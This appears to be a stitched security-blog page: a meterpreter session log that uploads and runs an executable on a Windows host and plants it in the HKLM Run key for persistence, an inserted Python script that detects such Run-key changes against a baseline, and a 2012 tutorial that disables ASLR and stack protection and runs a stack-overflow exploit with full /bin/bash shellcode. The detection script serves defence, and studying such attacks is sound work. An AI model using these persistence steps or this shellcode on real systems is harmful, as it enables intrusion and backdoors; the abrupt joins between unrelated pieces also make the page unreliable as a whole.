948 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe

meterpreter > ?

Core Commands

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

Command Description
------- -----------
timestomp Manipulate file MACE attributes

meterpreter > help

Core Commands

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

Command Description
------- -----------
timestomp Manipulate file MACE attributes

meterpreter > upload /root/sexy.exe c:\\windows\\system32
[*] uploading : /root/sexy.exe -> c:\windows\system32
[*] uploaded : /root/sexy.exe -> c:\windows\system32\sexy.exe
meterpreter > execute -f sexy.exe
Process 3372 created.
meterpreter > execute -f sexy.exe
Process 2816 created.
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\windows\
Successful set start.
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\window
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\run
Name: start
Type: REG_SZ
Data: c:\\windows\\system32\\sexy.exe
meterpreter > reboot
meterpreter >  
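The session above ends by registering the uploaded executable under the HKLM\...\CurrentVersion\Run key so it starts at every boot. From the defender's side, the practical control is to compare the Run key against a known-good snapshot of the same host. The script below is an added example (not from the original post): it parses output in the format the Windows `reg query` tool prints, diffs it against a baseline, and reports values that were added, changed or removed. Both the sample output and the baseline are constructed; the `start` value mirrors the entry set in the session.

```python
import re

# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# output: value name, type and data separated by runs of whitespace.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VBoxTray    REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
    GrooveMonitor    REG_EXPAND_SZ    "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe" /quiet
    start    REG_SZ    c:\\windows\\system32\\sexy.exe
"""

# Constructed known-good snapshot taken from the same host before the incident.
BASELINE = {
    "VBoxTray": r"C:\WINDOWS\system32\VBoxTray.exe",
    "GrooveMonitor": r'"C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe" /quiet',
}


def parse_reg_query(text: str) -> dict:
    """Map value name -> (type, data) from reg query output.

    Value lines are split on runs of two or more spaces (reg.exe uses four),
    which keeps single spaces inside quoted paths intact.
    """
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("HKEY"):
            continue                                  # blank line or key header
        parts = re.split(r"\s{2,}", line, maxsplit=2)
        if len(parts) < 2 or not parts[1].startswith("REG_"):
            continue                                  # not a value line
        name, rtype = parts[0], parts[1]
        data = parts[2].strip() if len(parts) == 3 else ""
        values[name] = (rtype, data)
    return values


def diff_against_baseline(values: dict, baseline: dict) -> list:
    """Report Run-key values that are new, changed or missing relative to the baseline."""
    findings = []
    for name, (_rtype, data) in values.items():
        if name not in baseline:
            findings.append({"value": name, "reason": "not in baseline", "data": data})
        elif baseline[name] != data:
            findings.append({"value": name, "reason": "data changed", "data": data})
    for name, data in baseline.items():
        if name not in values:
            findings.append({"value": name, "reason": "removed", "data": data})
    return findings


if __name__ == "__main__":
    current = parse_reg_query(SAMPLE_RUN_KEY)
    for finding in diff_against_baseline(current, BASELINE):
        print("%-16s %-16s %s" % (finding["value"], finding["reason"], finding["data"]))
```

The diff surfaces the `start` value because the baseline never had it; the generic name and the unexpected executable under system32 are what an analyst would then pull for inspection. A baseline diff is deliberately used instead of a "suspicious name" heuristic, because the value name and file name are entirely attacker-chosen. The same approach applies to the HKCU Run key, RunOnce and the Winlogon keys; in production the snapshot would come from a host export rather than a literal in the script.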

Friday, 24 February 2012

Exploitation Linux In BT 5 r1

Exploit Linux
Before we start, we should pray that the exploitation of Linux goes smoothly.
We start from the beginning of the story of Linux exploitation and go directly to the TKP (the scene)!
hehehehe ...

Okay, we first open a terminal and run the following commands:

root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space

As shown in the picture below.
Then we create a file with the C extension that uses the C++ language, and it looks like the picture below.
Next, compile the program that triggers the buffer overflow.
Next we look at a protection technique called "stack-smashing protection" (SSP), which is used to detect a buffer overflow on the stack before the malicious code is executed.
We can turn SSP off by adding the "-fno-stack-protector" flag to gcc when compiling.
Then we send 505 characters, but EIP is still not overwritten; then we send 508 characters and we can see that EIP is 0x41414141, as shown in the picture below.

Then we can see that the values of EBP and EIP have been overwritten. Next, we examine a specific register, ESP, as shown below.
Then we find out the address of ESP and subtract 200 bytes from it.
ESP is at address bffff16c, so we get the result: 0xbffff16c - 200 = 0xbfffef6c. To calculate these values we can use the Kcalc application.

Next, we generate the shellcode and run it:

run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')
Exploitation succeeded....